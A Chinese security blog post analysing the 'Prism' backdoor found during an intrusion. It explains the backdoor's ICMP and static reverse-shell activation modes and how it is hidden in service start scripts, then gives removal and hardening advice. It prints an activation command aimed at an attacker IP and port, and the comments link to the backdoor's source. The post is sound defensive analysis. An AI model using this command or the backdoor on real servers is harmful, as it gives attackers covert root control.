后门木马

后门木马
登录
注册
追踪一款“棱镜后门木马” 62651132018-09-19 首发专栏：网络攻击追踪溯源关注
一款用户空间隐形反向后门，可跨平台使用支持在Linux、Solaris、AIX、BSDMac、Android等操作系统，该木马有两种不同的激活方式分为：ICMP和STATIC模式。
背景介绍
近期笔者在处理非法入侵事件中，发现一款用户空间隐形反向壳后门，该木马具有较高的隐藏、迷惑性，一般会伪装成常见的服务名称，比较难易发现黑客（攻击者），会修改程序启动脚本文件，管理员对服务器任何服务进行重启、停止、启动等操作时均会运行该木马。

木马介绍
该木马是一款用户空间隐形反向后门，可夸平台使用支持在Linux、Solaris、AIX、BSD/Mac、Android等操作系统，该木马有两种不同的激活方式分为：ICMP和STATIC 模式；

木马分析
1、ICMP模式：此操作模式，后门在后台静默等待包含要连接的主机/端口的特定ICMP数据包和用于防止第三方访问的私钥；

注：此模式一般用于服务器或者设备可在外网直接访问，木马运行后默认是运行在该模式下，该模式运行后会在系统潜伏下来，等待着被激活，效果展示：图！

#激活代码
./sendPacket.py 192.168.3.25 p4ssw0rd 192.168.3.18 6688
#192.168.3.25 是受害机器运行棱镜后门
#p4ssw0rd是关键
#192.168.3.18是攻击者机器地址
#6688是攻击者机器监听的端口
1.png

图1：攻击者（服务器控制端）开启本地监听端口

2.png

图2：攻击者（发起恶意指令服务器）执行木马激活命令

3.png图3：控制受害者服务器

该木马的激活方式是通过ICMP协议，也就是大家常用ping命令，现在对比一下常规的ping数据包，和经过改造之后的数据包区别；

4.png

图1：为常规的ping命令数据包，length 64

5.png

图2：为改造之后的ping命令数据包，length 192

2、STATIC模式：此操作模式后门尝试连接到硬编码的IP / PORT，在这种情况下，只需控制端运行netcat监听指定端口，即可获得服务器管理权限如：图1（硬编方式）、图2（控制端监听端口）；

6.png

图 : 1 （控制者服务器地址，以及监听端口）

7.png图2 (拿到被控服务器端shell)

9.png

图3（获得被控端的root权限）

木马定位
该类型木马是运行用户空间，一般用于黑客（攻击者）利用服务器或者项目漏洞获取服务器root权限后，为了持久控制该服务器的一款木马，在真实场景黑客（攻击者）会做多种手段部署，包括但不限于修改服务启动脚本、sendmail 服务脚本等达到在用户未知情况下启动该木马脚本如：图1

8.png清除木马
1、临时停止正常服务，监控此时服务器对外发包的服务于进程，便可以快速定位控制者IP，端口号；

2、如果是生产环境并不能停止任何服务，那就需要一层层过滤，或者在服务器低峰视排查服务器；

3、定位出木马名称后，对服务器文件内容进行批量搜索，防止在其他服务加入该木马启动脚本；

如何防止
1、在安全组上关闭非业务的出、入站端口切记出站、出站、出站太多人忽略出站端口；

2、溯源攻击者进入服务器方式，进行补丁升级；

3、使用第三方工具记录所有的操作日志，以便快速溯源整个攻击过程；

4、对服务器的登录IP地址进行限制，如果不能限制IP，就限制可登入服务器时间；

5、服务器对外（外网）提供的服务已对应的用户启动管理服务器；

Rootkit

有人根据此木马繁衍出，更高级别的控制手段 rookit，具体使用部署方法下一篇文件具体介绍，有兴趣的童鞋可以自行研究以下；

专栏
2

6265113
6265113
4 篇文章
等级： 1级
关注
||
发表评论已有 5 条评论

Sharetrip (1级) 2018-09-19回复 1楼
大神，能否分享一下源码，学习学习？？？

亮了(3)

6265113 专栏作者(1级) 2018-09-21回复
@ Sharetrip https://github.com/andreafabrizi/prism

亮了(0)

虫子 2018-09-20回复 2楼
不发源码就是耍流氓

亮了(1)

6265113 专栏作者(1级) 2018-09-21回复
@ 虫子 https://github.com/andreafabrizi/prism

亮了(0)

sombra (1级) 2018-09-26回复 3楼
6年前的文件？怀疑现在杀软都能检测出来了

亮了(0)
昵称
请输入昵称
必须您当前尚未登录。登陆？注册邮箱
请输入邮箱地址
必须（保密）表情插图
有人回复时邮件通知我
相关推荐
WebShell入侵溯源跟踪TIPS
WebShell入侵溯源跟踪TIPS
本篇文章是以作者经验总结，从多个角度阐述挖掘多种不同层次的 WebShell、 溯源黑客（攻击者）如何一步一步在服务器植入 WebShell、最后如何通过网络跟踪技术定位到黑客（攻击者）IP、社交账户、系统环境、兴趣爱好…

62651132018-10-31594712
FREEBUF免责声明协议条款关于我们加入我们广告及服务寻求报道广告合作联系我们友情链接关注我们
官方微信
新浪微博腾讯微博Twitter赞助商
Copyright © 2018 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号
css.php 正在加载中...0daybank